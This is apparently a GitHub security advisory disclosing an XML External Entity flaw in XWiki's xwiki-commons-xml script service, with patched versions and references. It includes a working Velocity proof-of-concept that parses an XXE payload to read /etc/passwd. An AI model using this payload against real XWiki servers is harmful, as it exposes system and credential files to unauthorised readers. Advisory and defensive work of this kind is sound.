Arbitrary file access through XML parsing in org.xwiki.commons:xwiki-commons-xml

Impact

It's possible in a script to access any file accessing to the user running XWiki application server with XML External Entity Injection through the XML script service.

For example:

{{velocity}}
#set($xml=$services.get('xml'))
#set($xxe_payload = "<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root[<!ENTITY xxe SYSTEM 'file:///etc/passwd' >]><root><foo>&xxe;</foo></root>")
#set($doc=$xml.parse($xxe_payload))
$xml.serialize($doc)
{{/velocity}}

Patches

The problem has been patched on versions 12.10.10, 13.4.4 and 13.8RC1.

Workarounds

There's no easy workaround for fixing this vulnerability other than upgrading and being careful when giving Script rights.

References

https://jira.xwiki.org/browse/XWIKI-18946

For more information

If you have any questions or comments about this advisory:

Open an issue in Jira XWiki
Email us at XWiki Security mailing-list

References

tmortagne published to xwiki/xwiki-commons Apr 28, 2022

Published to the GitHub Advisory Database Apr 28, 2022

Reviewed Apr 28, 2022

Published by the National Vulnerability Database Apr 28, 2022

Last updated Jan 30, 2023

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Package

Affected versions

Patched versions

Description

Impact

Patches

Workarounds

References

For more information

References

Severity

CVSS base metrics

Weaknesses

CVE ID

GHSA ID

Source code